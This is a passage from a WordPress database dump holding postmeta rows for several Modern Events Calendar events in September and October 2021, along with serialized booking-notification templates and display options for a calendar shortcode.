e\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146109,265561,'mec_currency','a:0:{}'),(146110,265561,'mec_additional_organizer_ids','a:0:{}'),(146111,265561,'mec_additional_location_ids','a:0:{}'),(146112,265561,'mec_cost',''),(146113,265561,'mec_more_info_target','_self'),(146114,265561,'mec_more_info_title',''),(146115,265561,'mec_organizer_id','1'),(146116,265561,'mec_read_more',''),(146117,265561,'mec_more_info',''),(146118,265561,'mec_repeat_type',''),(146119,265561,'mec_repeat_status','0'),(146120,265561,'mec_end_day_seconds','61200'),(146121,265561,'mec_end_time_ampm','PM'),(146122,265561,'mec_end_time_minutes','0'),(146123,265561,'mec_end_time_hour','5'),(146124,265561,'mec_end_date','2021-09-19'),(146125,265561,'mec_start_day_seconds','57600'),(146126,265561,'mec_start_time_ampm','PM'),(146127,265561,'mec_start_time_minutes','0'),(146128,265561,'mec_public','1'),(146129,265561,'mec_start_date','2021-09-19'),(146130,265561,'mec_start_time_hour','4'),(146131,265561,'mec_countdown_method','global'),(146132,265561,'mec_timezone','global'),(146133,265561,'mec_comment',''),(146134,265561,'one_occurrence','0'),(146135,265561,'mec_hide_time','0'),(146136,265561,'mec_hide_end_time','0'),(146137,265561,'mec_event_status','EventScheduled'),(146138,265561,'mec_fields','a:0:{}'),(146139,265561,'mec_op','a:0:{}'),(146140,265561,'mec_bfixed_fields','a:0:{}'),(146141,265561,'mec_reg_fields','a:0:{}'),(146142,265561,'mec_reg_fields_global_inheritance','1'),(146143,265561,'mec_ticket_variations','a:0:{}'),(146144,265561,'mec_ticket_variations_global_inheritance','1'),(146145,265561,'mec_fees','a:0:{}'),(146146,265561,'mec_booking','a:0:{}'),(146147,265561,'mec_tickets','a:0:{}'),(146148,265561,'mec_fees_global_inheritance','1'),(146149,265561,'mec_hourly_schedules','a:0:{}'),(146150,265561,'mec_not_in_days',''),(146151,265561,'mec_in_days',''),(146152,265561,'mec_repeat_end_at_date',''),(146153,265561,'mec_advanced_days','a:0:{}'),(146154,265561,'passster_protection_type','password'),(146155,265561,'passster_activate_global_protection',NULL),(146156,265561,'passster_activate_protection',NULL),(146157,265561,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146158,265561,'mec_repeat_end_at_occurrences',''),(146159,265561,'mec_repeat_end',''),(146160,265561,'mec_repeat_interval','1'),(146161,265561,'mec_allday','0'),(146162,265561,'mec_certain_weekdays','a:0:{}'),(146163,265561,'mec_dont_show_map','0'),(146164,265561,'mec_location_id','132'),(146165,265561,'mec_color',''),(146166,265561,'protect_children',''),(146167,265561,'_edit_lock','1631509992:2'),(146168,265561,'_edit_last','2'),(146169,265561,'_thumbnail_id','265557'),(146170,265562,'mec_moved_online_link',''),(146171,265562,'mec_cancelled_reason',''),(146172,265562,'mec_display_cancellation_reason_in_single_page',''),(146173,265562,'boldgrid_hide_page_title','0'),(146174,265562,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146175,265562,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-26\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-26\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146176,265562,'mec_currency','a:0:{}'),(146177,265562,'mec_additional_organizer_ids','a:0:{}'),(146178,265562,'mec_additional_location_ids','a:0:{}'),(146179,265562,'mec_cost',''),(146180,265562,'mec_more_info_target','_self'),(146181,265562,'mec_more_info_title',''),(146182,265562,'mec_organizer_id','1'),(146183,265562,'mec_read_more',''),(146184,265562,'mec_more_info',''),(146185,265562,'mec_repeat_type',''),(146186,265562,'mec_repeat_status','0'),(146187,265562,'mec_end_day_seconds','61200'),(146188,265562,'mec_end_time_ampm','PM'),(146189,265562,'mec_end_time_minutes','0'),(146190,265562,'mec_end_time_hour','5'),(146191,265562,'mec_end_date','2021-09-26'),(146192,265562,'mec_start_day_seconds','57600'),(146193,265562,'mec_start_time_ampm','PM'),(146194,265562,'mec_start_time_minutes','0'),(146195,265562,'mec_public','1'),(146196,265562,'mec_start_date','2021-09-26'),(146197,265562,'mec_start_time_hour','4'),(146198,265562,'mec_countdown_method','global'),(146199,265562,'mec_timezone','global'),(146200,265562,'mec_comment',''),(146201,265562,'one_occurrence','0'),(146202,265562,'mec_hide_time','0'),(146203,265562,'mec_hide_end_time','0'),(146204,265562,'mec_event_status','EventScheduled'),(146205,265562,'mec_fields','a:0:{}'),(146206,265562,'mec_op','a:0:{}'),(146207,265562,'mec_bfixed_fields','a:0:{}'),(146208,265562,'mec_reg_fields','a:0:{}'),(146209,265562,'mec_reg_fields_global_inheritance','1'),(146210,265562,'mec_ticket_variations','a:0:{}'),(146211,265562,'mec_ticket_variations_global_inheritance','1'),(146212,265562,'mec_fees','a:0:{}'),(146213,265562,'mec_booking','a:0:{}'),(146214,265562,'mec_tickets','a:0:{}'),(146215,265562,'mec_fees_global_inheritance','1'),(146216,265562,'mec_hourly_schedules','a:0:{}'),(146217,265562,'mec_not_in_days',''),(146218,265562,'mec_in_days',''),(146219,265562,'mec_repeat_end_at_date',''),(146220,265562,'mec_advanced_days','a:0:{}'),(146221,265562,'passster_protection_type','password'),(146222,265562,'passster_activate_global_protection',NULL),(146223,265562,'passster_activate_protection',NULL),(146224,265562,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146225,265562,'mec_repeat_end_at_occurrences',''),(146226,265562,'mec_repeat_end',''),(146227,265562,'mec_repeat_interval','1'),(146228,265562,'mec_allday','0'),(146229,265562,'mec_certain_weekdays','a:0:{}'),(146230,265562,'mec_dont_show_map','0'),(146231,265562,'mec_location_id','132'),(146232,265562,'mec_color',''),(146233,265562,'protect_children',''),(146234,265562,'_edit_lock','1631510297:2'),(146235,265562,'_edit_last','2'),(146236,265562,'_thumbnail_id','265557'),(146237,265563,'mec_moved_online_link',''),(146238,265563,'mec_cancelled_reason',''),(146239,265563,'mec_display_cancellation_reason_in_single_page',''),(146240,265563,'boldgrid_hide_page_title','0'),(146241,265563,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146242,265563,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-03\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-03\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146243,265563,'mec_currency','a:0:{}'),(146244,265563,'mec_additional_organizer_ids','a:0:{}'),(146245,265563,'mec_additional_location_ids','a:0:{}'),(146246,265563,'mec_cost',''),(146247,265563,'mec_more_info_target','_self'),(146248,265563,'mec_more_info_title',''),(146249,265563,'mec_organizer_id','1'),(146250,265563,'mec_read_more',''),(146251,265563,'mec_more_info',''),(146252,265563,'mec_repeat_type',''),(146253,265563,'mec_repeat_status','0'),(146254,265563,'mec_end_day_seconds','61200'),(146255,265563,'mec_end_time_ampm','PM'),(146256,265563,'mec_end_time_minutes','0'),(146257,265563,'mec_end_time_hour','5'),(146258,265563,'mec_end_date','2021-10-03'),(146259,265563,'mec_start_day_seconds','57600'),(146260,265563,'mec_start_time_ampm','PM'),(146261,265563,'mec_start_time_minutes','0'),(146262,265563,'mec_public','1'),(146263,265563,'mec_start_date','2021-10-03'),(146264,265563,'mec_start_time_hour','4'),(146265,265563,'mec_countdown_method','global'),(146266,265563,'mec_timezone','global'),(146267,265563,'mec_comment',''),(146268,265563,'one_occurrence','0'),(146269,265563,'mec_hide_time','0'),(146270,265563,'mec_hide_end_time','0'),(146271,265563,'mec_event_status','EventScheduled'),(146272,265563,'mec_fields','a:0:{}'),(146273,265563,'mec_op','a:0:{}'),(146274,265563,'mec_bfixed_fields','a:0:{}'),(146275,265563,'mec_reg_fields','a:0:{}'),(146276,265563,'mec_reg_fields_global_inheritance','1'),(146277,265563,'mec_ticket_variations','a:0:{}'),(146278,265563,'mec_ticket_variations_global_inheritance','1'),(146279,265563,'mec_fees','a:0:{}'),(146280,265563,'mec_booking','a:0:{}'),(146281,265563,'mec_tickets','a:0:{}'),(146282,265563,'mec_fees_global_inheritance','1'),(146283,265563,'mec_hourly_schedules','a:0:{}'),(146284,265563,'mec_not_in_days',''),(146285,265563,'mec_in_days',''),(146286,265563,'mec_repeat_end_at_date',''),(146287,265563,'mec_advanced_days','a:0:{}'),(146288,265563,'passster_protection_type','password'),(146289,265563,'passster_activate_global_protection',NULL),(146290,265563,'passster_activate_protection',NULL),(146291,265563,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146292,265563,'mec_repeat_end_at_occurrences',''),(146293,265563,'mec_repeat_end',''),(146294,265563,'mec_repeat_interval','1'),(146295,265563,'mec_allday','0'),(146296,265563,'mec_certain_weekdays','a:0:{}'),(146297,265563,'mec_dont_show_map','0'),(146298,265563,'mec_location_id','132'),(146299,265563,'mec_color',''),(146300,265563,'protect_children',''),(146301,265563,'_edit_lock','1631997746:2'),(146302,265563,'_edit_last','2'),(146303,265563,'_thumbnail_id','265557'),(146304,265565,'_edit_lock','1687287259:2'),(146305,265565,'_edit_last','2'),(146307,265565,'label',''),(146308,265565,'category','110,113,114,116'),(146309,265565,'location',''),(146310,265565,'organizer',''),(146311,265565,'tag',''),(146312,265565,'author',''),(146313,265565,'sf_status','1'),(146314,265565,'sf_display_label','0'),(146315,265565,'sf_reset_button','0'),(146316,265565,'sf_refine','0'),(146317,265565,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(146318,265565,'skin','carousel'),(146319,265565,'sk-options','a:20:{s:4:\"list\";a:40:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"status_bar\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";s:20:\"next_previous_button\";s:1:\"1\";s:17:\"display_thumbnail\";s:1:\"1\";}s:4:\"grid\";a:40:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";s:20:\"next_previous_button\";s:1:\"1\";s:17:\"display_thumbnail\";s:1:\"1\";}s:6:\"agenda\";a:19:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F 